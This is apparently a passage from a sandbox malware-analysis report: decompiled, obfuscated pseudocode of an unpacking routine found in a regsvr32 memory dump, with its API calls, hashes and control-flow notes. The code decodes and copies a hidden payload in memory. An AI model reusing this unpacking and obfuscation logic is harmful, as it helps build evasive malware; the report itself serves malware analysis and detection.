                                          					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) & 0x00000000;
                                          					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) ^ (_t226 -  *(_t244 - 8) | _t166);
                                          					_t226 =  *(_t244 - 8);
                                          					_pop( *_t113);
                                          					_t193 =  *(_t244 - 8);
                                          					 *_t115 = _t193;
                                          					_t159 = _t166 & 0x00000000 ^  *(_t244 - 4);
                                          				}
                                          				_t160 = memset(_t226, _t159, _t193 << 0);
                                          				_t227 = _t226 + _t193;
                                          				_t194 = 0;
                                          				if( *(_t185 + 0x4353ce) == 0) {
                                          					_t160 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4359ac);
                                          					 *(_t244 - 4) = _t215;
                                          					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) & 0x00000000;
                                          					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) | _t215 -  *(_t244 - 4) | _t160;
                                          					_t215 =  *(_t244 - 4);
                                          				}
                                          				if( *((intOrPtr*)(_t185 + 0x43574e)) != _t185) {
                                          					if( *(_t185 + 0x4357d6) == 0) {
                                          						_t164 =  *((intOrPtr*)(_t185 + 0x441058))();
                                          						 *(_t244 - 8) = _t237;
                                          						 *(_t185 + 0x4357d6) = 0 ^ _t164;
                                          						_t237 =  *(_t244 - 8);
                                          					}
                                          					_push( *((intOrPtr*)(_t185 + 0x43574e)));
                                          					if( *((intOrPtr*)(_t185 + 0x435177)) == 0) {
                                          						_t163 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4351ff);
                                          						 *(_t244 - 8) = _t194;
                                          						 *((intOrPtr*)(_t185 + 0x435177)) = _t163;
                                          						_t194 =  *(_t244 - 8);
                                          					}
                                          					_t161 = E0019242A(_t185, _t194, _t215, _t227, _t237); // executed
                                          					if( *((intOrPtr*)(_t185 + 0x43536a)) == 0) {
                                          						 *_t144 =  *((intOrPtr*)(_t185 + 0x4410a8))(0,  *((intOrPtr*)(_t185 + 0x43549e)));
                                          						 *_t146 =  *(_t244 - 4);
                                          					}
                                          					_t160 = E00193658(_t161, _t185, _t215, _t227, _t237,  *((intOrPtr*)(_t185 + 0x43574e)));
                                          				}
                                          				 *(_t244 - 8) = _t194;
                                          				 *_t151 = _t215 & 0x00000000 ^ (_t194 & 0x00000000 |  *(_t185 + 0x4351a7));
                                          				 *_t153 =  *(_t244 - 4);
                                          				asm("popad");
                                          				return _t160;
                                          			}

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 001914AB
                                          • VirtualProtect.KERNEL32(?), ref: 001915B1
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocProtect
                                          • String ID:
                                          • API String ID: 2447062925-0
                                          • Opcode ID: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
                                          • Instruction ID: 45e2602dace533f8fee477fd2ade58a9355cc41a58158dc6f6f6cf48857a3d95
                                          • Opcode Fuzzy Hash: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
                                          • Instruction Fuzzy Hash: 91C14E72904604EFFF18CFA0C889B997BB1FF64311F1860A9ED0D9E19AD77415A4CB28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          [Figure: control-flow graph 543, starting at block 1932eb-193307; labelled nodes: OleUninitialize, OleInitialize, LoadLibraryA. Legend: Executed / Not Executed.]
                                          APIs
                                          • OleUninitialize.OLE32(00192C25), ref: 00193354
                                          • OleInitialize.OLE32(00000000,00000000), ref: 0019349A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID: InitializeUninitialize
                                          • String ID:
                                          • API String ID: 3442037557-0
                                          • Opcode ID: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
                                          • Instruction ID: d39962fea42d0c23e39fbdfc9bae482fb56329767f8883d3c7ccf3764c87281f
                                          • Opcode Fuzzy Hash: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
                                          • Instruction Fuzzy Hash: 97518A72D04619DFEF14CFA4C8897AABBB1FF14311F09916ADD49AB189C7340690CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00193726(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _t416;
                                          				signed int _t417;
                                          				signed int _t421;
                                          				void* _t425;
                                          				signed int _t427;
                                          				signed int _t429;
                                          				signed int _t434;
                                          				signed int _t436;
                                          				signed int _t438;
                                          				signed int _t440;
                                          				signed int _t441;
                                          				signed int _t443;
                                          				signed int _t446;
                                          				signed int _t450;
                                          				signed int _t451;
                                          				signed int _t453;
                                          				signed int _t454;
                                          				signed int _t455;
                                          				intOrPtr _t457;
                                          				signed int _t459;
                                          				signed int _t461;
                                          				signed int _t462;
                                          				signed int _t465;
                                          				signed int _t466;
                                          				signed int _t468;
                                          				signed int _t469;
                                          				signed int _t471;
                                          				signed int _t473;
                                          				signed int _t476;
                                          				signed int _t477;
                                          				signed int _t478;
                                          				signed int _t480;
                                          				signed int _t481;
                                          				signed int _t486;
                                          				signed int _t489;
                                          				void* _t493;
                                          				void* _t495;
                                          				signed int _t497;
                                          				signed int _t500;
                                          				void* _t503;
                                          				signed int _t504;
                                          				signed int _t507;
                                          				signed int _t509;
                                          				signed int _t512;
                                          				signed int _t514;
                                          				signed int _t515;
                                          				signed int _t520;
                                          				signed int _t525;
                                          				int _t527;
                                          				int _t531;
                                          				void* _t567;
                                          				signed int _t568;
                                          				signed int _t570;
                                          				signed int _t584;
                                          				signed int _t585;
                                          				signed int _t587;
                                          				void* _t590;
                                          				void* _t592;
                                          				void* _t625;
                                          				intOrPtr* _t626;
                                          				signed int _t627;
                                          				void* _t629;
                                          				signed int _t634;
                                          				signed int _t637;
                                          				signed int _t639;
                                          				void* _t640;
                                          				void* _t641;
                                          				signed int _t657;
                                          				signed int _t660;
                                          				signed int* _t672;
                                          				signed int* _t673;
                                          				signed int* _t676;
                                          				intOrPtr* _t677;
                                          				signed int* _t678;
                                          
                                          				_t625 = __esi;
                                          				_t584 = __edi;
                                          				_t567 = __edx;
                                          				_t504 = __ecx;
                                          				_t493 = __ebx;
                                          				if( *((intOrPtr*)(__ebx + 0x435126)) == 0) {
                                          					_push(__ebx + 0x4354be);
                                          					 *_t4 =  *((intOrPtr*)(__ebx + 0x44106c))();
                                          					_push(_v20);
                                          					_pop( *_t6);
                                          				}
                                          				_t416 = _t493 + 0x435323;
                                          				if( *(_t493 + 0x4351eb) == 0) {
                                          					_t489 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x43521f, _t416);
                                          					 *_t672 = _t657;
                                          					 *(_t493 + 0x4351eb) = 0 ^ _t489;
                                          					_t657 = 0;
                                          					_t416 =  *_t672;
                                          					_t672 = _t672 - 0xfffffffc;
                                          				}
                                          				_push(_t416);
                                          				_t417 = _t493 + 0x43569a;
                                          				if( *(_t493 + 0x4354fd) == 0) {
                                          					_t486 =  *((intOrPtr*)(_t493 + 0x44105c))(_t417);
                                          					_v12 = _t584;
                                          					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) & 0x00000000;
                                          					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) | _t584 - _v12 | _t486;
                                          					_t584 = _v12;
                                          					_t417 =  *_t672;
                                          					_t672 = _t672 - 0xfffffffc;
                                          				}
                                          				 *_t23 =  *((intOrPtr*)(_t493 + 0x441044))(_t417);
                                          				_push(_v16);
                                          				_pop( *_t25);
                                          				if( *((intOrPtr*)(_t493 + 0x43599c)) == 0) {
                                          					 *_t29 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4357a6)));
                                          					_push(_v12);
                                          					_pop( *_t31);
                                          				}
                                          				_push(_t625);
                                          				if( *((intOrPtr*)(_t493 + 0x435611)) == 0) {
                                          					_t481 = _t493 + 0x4353d6;
                                          					if( *((intOrPtr*)(_t493 + 0x4356e9)) == 0) {
                                          						 *_t37 =  *((intOrPtr*)(_t493 + 0x441070))( *((intOrPtr*)(_t493 + 0x43584d)), _t481);
                                          						_push(_v20);
                                          						_pop( *_t39);
                                          						_t481 =  *_t672;
                                          						_t672 = _t672 - 0xfffffffc;
                                          					}
                                          					 *_t41 =  *((intOrPtr*)(_t493 + 0x441054))(_t481);
                                          					_push(_v12);
                                          					_pop( *_t43);
                                          				}
                                          				_push(_t584);
                                          				if( *(_t493 + 0x4356f5) == 0) {
                                          					_t480 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x43594c)),  *((intOrPtr*)(_t493 + 0x435112)));
                                          					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) & 0x00000000;
                                          					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) ^ _t504 & 0x00000000 ^ _t480;
                                          					_t504 = _t504;
                                          				}
                                          				_push(_a4);
                                          				_pop( *_t53);
                                          				_push(_v12);
                                          				_pop(_t626);
                                          				if( *(_t493 + 0x4358dc) == 0) {
                                          					_t476 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x43592c, _t493 + 0x435509);
                                          					_v16 = _t584;
                                          					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) & 0x00000000;
                                          					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) ^ _t584 ^ _v16 ^ _t476;
                                          					_t477 =  *((intOrPtr*)(_t493 + 0x441060))();
                                          					if( *(_t493 + 0x435268) == 0) {
                                          						_t478 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4354da)), _t477);
                                          						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) & 0x00000000;
                                          						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) | _t567 ^  *_t672 ^ _t478;
                                          						_t567 = _t567;
                                          						_t477 =  *_t672;
                                          						_t672 =  &(_t672[1]);
                                          					}
                                          					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) & 0x00000000;
                                          					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) | _t626 -  *_t672 ^ _t477;
                                          					_t626 = _t626;
                                          				}
                                          				_v12 = _t504;
                                          				_t585 = 0 ^ _a8;
                                          				_t507 = _v12;
                                          				if( *(_t493 + 0x435675) == 0) {
                                          					_t473 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435994);
                                          					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) & 0x00000000;
                                          					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) | _t507 & 0x00000000 ^ _t473;
                                          					_t507 = _t507;
                                          				}
                                          				if( *(_t493 + 0x435732) == 0) {
                                          					if( *(_t493 + 0x435142) == 0) {
                                          						_t471 =  *((intOrPtr*)(_t493 + 0x441060))();
                                          						_v16 = _t626;
                                          						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) & 0x00000000;
                                          						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) | _t626 - _v16 | _t471;
                                          						_t626 = _v16;
                                          					}
                                          					_t469 =  *((intOrPtr*)(_t493 + 0x44105c))();
                                          					_v20 = _t507;
                                          					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) & 0x00000000;
                                          					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) ^ _t507 ^ _v20 ^ _t469;
                                          					if( *((intOrPtr*)(_t493 + 0x43545a)) == 0) {
                                          						 *_t113 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x4357c2)),  *((intOrPtr*)(_t493 + 0x4350a0)), 0x61,  *((intOrPtr*)(_t493 + 0x43587c)),  *((intOrPtr*)(_t493 + 0x4356ad)),  *((intOrPtr*)(_t493 + 0x435819)), 0x400);
                                          						_push(_v12);
                                          						_pop( *_t115);
                                          					}
                                          				}
                                          				_push( *((intOrPtr*)(_t626 + 8)));
                                          				if( *(_t493 + 0x435898) == 0) {
                                          					_t468 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435290);
                                          					_v12 = _t585;
                                          					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) & 0x00000000;
                                          					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) ^ (_t585 & 0x00000000 | _t468);
                                          					_t585 = _v12;
                                          				}
                                          				_push(_t585);
                                          				if( *(_t493 + 0x4358d8) == 0) {
                                          					_t466 =  *((intOrPtr*)(_t493 + 0x441070))(0);
                                          					 *_t672 = _t567;
                                          					 *(_t493 + 0x4358d8) = 0 ^ _t466;
                                          					_t567 = 0;
                                          				}
                                          				if( *((intOrPtr*)(_t493 + 0x435456)) == 0) {
                                          					if( *(_t493 + 0x4355f9) == 0) {
                                          						_t465 =  *((intOrPtr*)(_t493 + 0x441070))(0);
                                          						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) & 0x00000000;
                                          						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) ^ (_t585 & 0x00000000 | _t465);
                                          						_t585 = _t585;
                                          					}
                                          					_t462 =  *((intOrPtr*)(_t493 + 0x4410a4))(1);
                                          					if( *((intOrPtr*)(_t493 + 0x4359a0)) == 0) {
                                          						 *_t143 =  *((intOrPtr*)(_t493 + 0x4410a0))(0, 0,  *((intOrPtr*)(_t493 + 0x435940)), 0x4c,  *((intOrPtr*)(_t493 + 0x435665)),  *((intOrPtr*)(_t493 + 0x435a51)),  *((intOrPtr*)(_t493 + 0x435a15)), _t462);
                                          						_push(_v16);
                                          						_pop( *_t145);
                                          						_t462 =  *_t672;
                                          						_t672 = _t672 - 0xfffffffc;
                                          					}
                                          					 *_t146 = _t462;
                                          					_push(_v16);
                                          					_pop( *_t148);
                                          				}
                                          				 *_t150 =  *((intOrPtr*)(_t493 + 0x435280));
                                          				_push(_v12);
                                          				_t509 =  &_v20;
                                          				_t660 = _t657;
                                          				_push(_t509);
                                          				if( *(_t493 + 0x4359bd) == 0) {
                                          					_t461 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435880, _t509);
                                          					_v20 = _t509;
                                          					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) & 0x00000000;
                                          					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) | _t509 - _v20 ^ _t461;
                                          					_t509 = (_v20 & 0x00000000) +  *_t672;
                                          					_t672 = _t672 - 0xfffffffc;
                                          				}
                                          				_t627 = _t626 +  *_t626;
                                          				if( *(_t493 + 0x4357f2) == 0) {
                                          					_push(_t509);
                                          					if( *(_t493 + 0x4355bd) == 0) {
                                          						_t459 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x43509c);
                                          						_v16 = _t627;
                                          						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) & 0x00000000;
                                          						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) | _t627 & 0x00000000 ^ _t459;
                                          						_t627 = _v16;
                                          					}
                                          					_push( *((intOrPtr*)(_t493 + 0x4350ac)));
                                          					_push(0xc);
                                          					if( *((intOrPtr*)(_t493 + 0x435894)) == 0) {
                                          						_t457 =  *((intOrPtr*)(_t493 + 0x441068))(_t493 + 0x4359a4);
                                          						 *_t672 = _t627;
                                          						 *((intOrPtr*)(_t493 + 0x435894)) = _t457;
                                          						_t627 = 0;
                                          					}
                                          					_push( *((intOrPtr*)(_t493 + 0x435346)));
                                          					if( *(_t493 + 0x435815) == 0) {
                                          						_t455 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x435776)), 4);
                                          						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) & 0x00000000;
                                          						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) ^ (_t627 & 0x00000000 | _t455);
                                          						_t627 = _t627;
                                          					}
                                          					_push(0x2e);
                                          					_push( *((intOrPtr*)(_t493 + 0x435a19)));
                                          					if( *(_t493 + 0x435a09) == 0) {
                                          						_t454 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x4356f1)),  *((intOrPtr*)(_t493 + 0x43544a)));
                                          						_v12 = _t509;
                                          						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) & 0x00000000;
                                          						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) | _t509 ^ _v12 ^ _t454;
                                          						_t509 = _v12;
                                          					}
                                          					_t451 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x435639)),  *((intOrPtr*)(_t493 + 0x435317)));
                                          					if( *(_t493 + 0x4359dd) == 0) {
                                          						_t453 =  *((intOrPtr*)(_t493 + 0x441054))(_t493 + 0x435432, _t451);
                                          						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) & 0x00000000;
                                          						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) ^ (_t509 ^  *_t672 | _t453);
                                          						_t509 = _t509;
                                          						_pop( *_t207);
                                          						_t451 = _v12;
                                          					}
                                          					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) & 0x00000000;
                                          					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) | _t660 -  *_t672 | _t451;
                                          					_t660 = _t660;
                                          					_t509 =  *_t672;
                                          					_t672 = _t672 - 0xfffffffc;
                                          				}
                                          				do {
                                          					asm("movsb");
                                          					_t509 = _t509 - 1;
                                          				} while (_t509 != 0);
                                          				_t421 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x435812, _t493 + 0x4356cd);
                                          				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) & 0x00000000;
                                          				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) | _t509 & 0x00000000 ^ _t421;
                                          				_t512 = _t509;
                                          				if( *(_t493 + 0x4355d5) == 0) {
                                          					_push(_t493 + 0x435736);
                                          					if( *(_t493 + 0x4352bf) == 0) {
                                          						_t450 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x4358fc);
                                          						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) & 0x00000000;
                                          						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) ^ (_t585 & 0x00000000 | _t450);
                                          						_t585 = _t585;
                                          					}
                                          					_t421 =  *((intOrPtr*)(_t493 + 0x44106c))();
                                          					_push(_t585);
                                          					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) & 0x00000000;
                                          					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) | _t585 -  *_t672 | _t421;
                                          					if( *(_t493 + 0x435264) == 0) {
                                          						_t421 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x435070);
                                          						_v12 = _t567;
                                          						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) & 0x00000000;
                                          						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) | _t567 & 0x00000000 | _t421;
                                          						_t567 = _v12;
                                          					}
                                          				}
                                          				_pop( *_t243);
                                          				_t514 = _t512 & 0x00000000 ^ _v20;
                                          				if( *(_t493 + 0x4359ed) == 0) {
                                          					_t421 =  *((intOrPtr*)(_t493 + 0x44105c))(_t514);
                                          					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) & 0x00000000;
                                          					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) | _t660 & 0x00000000 | _t421;
                                          					_t660 = _t660;
                                          					_t514 =  *_t672;
                                          					_t672 =  &(_t672[1]);
                                          				}
                                          				_t587 =  *_t672;
                                          				_t673 =  &(_t672[1]);
                                          				if( *(_t493 + 0x4351b7) == 0) {
                                          					_t421 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4352a0)), _t514);
                                          					_v16 = _t514;
                                          					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) & 0x00000000;
                                          					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) | _t514 - _v16 | _t421;
                                          					_pop( *_t261);
                                          					_t514 = _v16;
                                          				}
                                          				_v12 = _t421;
                                          				_t629 = _t627 & 0x00000000 | _t421 ^ _v12 | _t587;
                                          				_push(_t493);
                                          				do {
                                          					_t425 =  *_t629 & 0x000000ff;
                                          					_t629 = _t629 + 1;
                                          					if(_t425 == 0) {
                                          						goto L64;
                                          					}
                                          					_push(_t514);
                                          					 *_t673 = 1;
                                          					_t515 = _t629;
                                          					 *_t266 = _t629;
                                          					_push(_v20);
                                          					_pop(_t567);
                                          					_v8 = 8;
                                          					do {
                                          						asm("rol eax, cl");
                                          						_t495 = _t425;
                                          						_t425 = _t567;
                                          						asm("ror ebx, cl");
                                          						_t269 =  &_v8;
                                          						 *_t269 = _v8 - 1;
                                          					} while ( *_t269 != 0);
                                          					 *_t673 = _t515;
                                          					_t425 = _t495;
                                          					 *_t271 = 0;
                                          					_t514 = 0 ^ _v12;
                                          					L64:
                                          					asm("stosb");
                                          					_t514 = _t514 - 1;
                                          				} while (_t514 != 0);
                                          				_pop( *_t273);
                                          				_t497 = 0 ^ _v12;
                                          				if( *((intOrPtr*)(_t497 + 0x4354f9)) == 0) {
                                          					_t425 =  *((intOrPtr*)(_t497 + 0x4410a8))( *((intOrPtr*)(_t497 + 0x43541a)),  *((intOrPtr*)(_t497 + 0x4351cf)));
                                          					 *_t279 = _t425;
                                          					_push(_v12);
                                          					_pop( *_t281);
                                          				}
                                          				if( *(_t497 + 0x435122) == 0) {
                                          					_t283 = _t497 + 0x435182; // 0x435182
                                          					if( *(_t497 + 0x4357e2) == 0) {
                                          						_t446 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x435671)));
                                          						_v12 = _t587;
                                          						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) & 0x00000000;
                                          						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) ^ _t587 - _v12 ^ _t446;
                                          						_t587 = _v12;
                                          					}
                                          					_t425 =  *((intOrPtr*)(_t497 + 0x441064))();
                                          					_v20 = _t567;
                                          					 *(_t497 + 0x435122) = _t425;
                                          					_t567 = _v20;
                                          					if( *(_t497 + 0x4354ca) == 0) {
                                          						_t425 =  *((intOrPtr*)(_t497 + 0x44105c))();
                                          						 *_t673 = _t660;
                                          						 *(_t497 + 0x4354ca) = _t425;
                                          						_t660 = 0;
                                          					}
                                          				}
                                          				if(_a4 != 0) {
                                          					if( *(_t497 + 0x435250) == 0) {
                                          						_t303 = _t497 + 0x4358c0; // 0x4358c0
                                          						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t303);
                                          						 *_t673 = _t629;
                                          						 *(_t497 + 0x435250) = 0 ^ _t425;
                                          						_t629 = 0;
                                          					}
                                          					if(_a8 != 0) {
                                          						if( *(_t497 + 0x435213) == 0) {
                                          							_t443 =  *((intOrPtr*)(_t497 + 0x441060))();
                                          							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) & 0x00000000;
                                          							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) | _t587 -  *_t673 ^ _t443;
                                          							_t587 = _t587;
                                          						}
                                          						_t425 = E00191C5D(_t497, _t514, _t567, _t629, _a8, _a4);
                                          					}
                                          				}
                                          				_pop( *_t315);
                                          				_t568 = _v20;
                                          				if( *(_t497 + 0x4352f3) == 0) {
                                          					_t425 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x43531f)), _t568);
                                          					_push(_t514);
                                          					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) & 0x00000000;
                                          					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) ^ (_t514 -  *_t673 | _t425);
                                          					_t568 =  *_t673;
                                          					_t673 = _t673 - 0xfffffffc;
                                          				}
                                          				if(_t568 > 0) {
                                          					if( *(_t497 + 0x4354b6) == 0) {
                                          						_t425 =  *((intOrPtr*)(_t497 + 0x4410a0))( *((intOrPtr*)(_t497 + 0x435088)),  *((intOrPtr*)(_t497 + 0x435412)),  *((intOrPtr*)(_t497 + 0x4355a1)), 0xd,  *((intOrPtr*)(_t497 + 0x43577e)),  *((intOrPtr*)(_t497 + 0x435298)), 0x400);
                                          						_v12 = _t587;
                                          						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) & 0x00000000;
                                          						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) ^ (_t587 - _v12 | _t425);
                                          					}
                                          					_push(_a4);
                                          					_pop( *_t339);
                                          					_push(_v16);
                                          					_pop(_t590);
                                          					_push(_t590);
                                          					 *_t673 = _t629;
                                          					_t520 =  *(_t590 + 4);
                                          					_t634 = 0;
                                          					if( *(_t497 + 0x4350bc) == 0) {
                                          						_t343 = _t497 + 0x4355b5; // 0x4355b5
                                          						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t343, _t520);
                                          						_push(0);
                                          						 *_t673 = _t660;
                                          						 *(_t497 + 0x4350bc) = 0 ^ _t425;
                                          						_t520 =  *_t673;
                                          						_t673 =  &(_t673[1]);
                                          					}
                                          					_v16 = _t497;
                                          					_t427 = _t425 & 0x00000000 ^ _t497 & 0x00000000 ^  *(_t590 + 8);
                                          					_t500 = _v16;
                                          					if( *(_t500 + 0x435659) == 0) {
                                          						_t441 =  *((intOrPtr*)(_t500 + 0x441060))();
                                          						_v12 = _t590;
                                          						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) & 0x00000000;
                                          						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) ^ _t590 & 0x00000000 ^ _t441;
                                          						_t590 = _v12;
                                          						 *_t357 = _t520;
                                          						_t520 = _t520 & 0x00000000 ^ _v12;
                                          						 *_t359 = _t427;
                                          						_t427 = _v16;
                                          					}
                                          					_push(_t520);
                                          					_push(_t520);
                                          					_v16 = _t634;
                                          					_t570 = _t568 & 0x00000000 | _t634 ^ _v16 ^ _t427;
                                          					_t637 = _v16;
                                          					if( *(_t500 + 0x4353fa) == 0) {
                                          						_t365 = _t500 + 0x43595c; // 0x43595c
                                          						_t440 =  *((intOrPtr*)(_t500 + 0x44106c))(_t365, _t570);
                                          						_v16 = _t590;
                                          						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) & 0x00000000;
                                          						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) ^ (_t590 ^ _v16 | _t440);
                                          						_t590 = _v16;
                                          						_t570 = (_t570 & 0x00000000) +  *_t673;
                                          						_t673 = _t673 - 0xfffffffc;
                                          					}
                                          					_v16 = _t520;
                                          					_t639 = _t637 & 0x00000000 ^ _t520 - _v16 ^ _a8;
                                          					_push( *_t673);
                                          					 *_t673 =  *_t673 - _t570;
                                          					_pop(_t525);
                                          					if( *(_t500 + 0x435984) == 0) {
                                          						_t379 = _t500 + 0x435829; // 0x435829
                                          						_t438 =  *((intOrPtr*)(_t500 + 0x441064))(_t570, _t525);
                                          						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) & 0x00000000;
                                          						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) | _t590 & 0x00000000 | _t438;
                                          						_t590 = _t590;
                                          						_t570 =  *_t673;
                                          						_t673 = _t673 - 0xfffffffc;
                                          						 *_t385 = _t379;
                                          						_t525 = _t525 & 0x00000000 | _v12;
                                          					}
                                          					_t640 = _t639 + _t525;
                                          					_t527 = _t525 & 0x00000000 ^ (_t500 -  *_t673 |  *(_t590 + 8));
                                          					_t503 = _t500;
                                          					if( *(_t503 + 0x43579a) == 0) {
                                          						_t389 = _t503 + 0x4359c1; // 0x4359c1
                                          						_t436 =  *((intOrPtr*)(_t503 + 0x441064))(_t527);
                                          						_v16 = _t527;
                                          						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) & 0x00000000;
                                          						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) ^ (_t527 & 0x00000000 | _t436);
                                          						 *_t397 = _t389;
                                          						_t570 = _t570 & 0x00000000 | _v12;
                                          						 *_t399 = _t570;
                                          						_t527 = _v20;
                                          					}
                                          					memcpy(_t590, _t640, _t527);
                                          					_t676 =  &(_t673[3]);
                                          					_t592 = _t640 + _t527 + _t527;
                                          					_push(_a8);
                                          					_pop( *_t402);
                                          					_push(_v20);
                                          					_pop(_t641);
                                          					if( *(_t503 + 0x4352b7) == 0) {
                                          						_t405 = _t503 + 0x435237; // 0x435237
                                          						_t434 =  *((intOrPtr*)(_t503 + 0x441068))(_t405, _t570);
                                          						_v20 = _t641;
                                          						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) & 0x00000000;
                                          						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) ^ _t641 & 0x00000000 ^ _t434;
                                          						_t641 = _v20;
                                          						_t570 =  *_t676;
                                          						_t676 = _t676 - 0xfffffffc;
                                          					}
                                          					_t677 = _t676 - 0xfffffffc;
                                          					_push(0 ^  *_t676);
                                          					 *_t677 =  *_t677 - _t570;
                                          					_pop(_t531);
                                          					_t429 = memcpy(_t592, _t641, _t531);
                                          					_t678 = _t677 + 0xc;
                                          					 *_t414 = _t429;
                                          					_t629 =  *_t678;
